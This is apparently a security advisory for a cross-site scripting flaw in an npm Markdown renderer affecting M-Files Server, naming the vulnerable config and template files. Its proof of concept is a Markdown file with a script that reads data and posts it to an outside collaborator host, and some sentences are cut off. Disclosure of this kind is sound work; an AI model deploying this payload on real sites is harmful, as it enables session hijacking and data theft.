PT-2026-42586 · Npm · M-Files Server
Published 2026-05-21 · Updated 2026-05-21
CVSS v3.1: 7.2 (High)
| Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N |
Summary
A cross-site scripting (XSS) vulnerability exists in the application’s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML—including
Details
An attacker can craft malicious Markdown content containing
Vulnerable Components
config.js → markdownIt: { html: true } (Lines 26–30)
The Markdown renderer is explicitly configured to allow raw HTML.
lib/markd.js (Lines 33–58)
Renders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.
lib/pages/template.html
The rendered Markdown is injected into the HTML template using <%= markdown %> without sanitization or output encoding.
PoC
Create a pwn.md:
# Hello
<script>
fetch('/etc/passwd', { credentials: 'include' })
.then(r => r.text())
.then(t => fetch('https://79evxsw3m08qfyvxluebgl0pyg47szgo.oastify.com/exfil', { method: 'POST', body: t }));
</script>
Open it in a browser.
View the HTTP request in Burp Collaborator.

Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to:
- Session hijacking
- Account takeover
- Credential theft
- Defacement or injection of malicious content
- Exfiltration of sensitive data via API tokens, CSRF tokens, or user information
This affects all users who can view Markdown content within the application.
Fix
XSS
Related Identifiers
Affected Products
M-Files Server